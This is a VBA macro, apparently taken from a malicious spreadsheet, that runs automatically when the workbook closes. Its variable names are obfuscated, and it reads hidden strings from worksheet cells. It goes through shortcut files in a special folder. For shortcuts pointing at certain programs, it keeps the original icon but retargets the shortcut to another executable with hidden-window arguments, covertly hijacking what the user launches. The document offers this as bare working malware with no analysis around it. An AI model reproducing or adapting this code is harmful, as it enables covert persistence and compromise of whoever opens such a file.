Sub Auto_Close()
Set QWCwfsXVK = CreateObject(activeSheet.Range("AU52").value)
Set OaHEFmi = CreateObject(activeSheet.Range("AX52").value)
Set BzRhUM = OaHEFmi.GetFolder(QWCwfsXVK.SpecialFolders(activeSheet.Range("BB52").value))
For Each EkGAKUCy In BzRhUM.Files
If(InStr(Lcase(EkGAKUCy), ".lnk")) Then
Set jUFrhNiu = QWCwfsXVK.CreateShortcut(QWCwfsXVK.SPecialFolders(activeSheet.Range("BB52").value) & "\" & EkGAKUCy.name)
If(InStr(Lcase(jUFrhNiu.targetPath), activeSheet.Range("BF52").value) or InStr(Lcase(jUFrhNiu.targetPath), activeSheet.Range("BI52").value) or InStr(Lcase(jUFrhNiu.targetPath), activeSheet.Range("BM52").value)) Then
jUFrhNiu.IconLocation = jUFrhNiu.targetpath
jUFrhNiu.arguments = "-w " & activeSheet.Range("BO52").Value & jUFrhNiu.targetPath & "'" & activeSheet.Range("BQ52").Value
jUFrhNiu.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BS52").value
if(Len(jUFrhNiu.arguments) < 1023) Then
jUFrhNiu.save
end if
end if
end if
next EkGAKUCy
End Sub
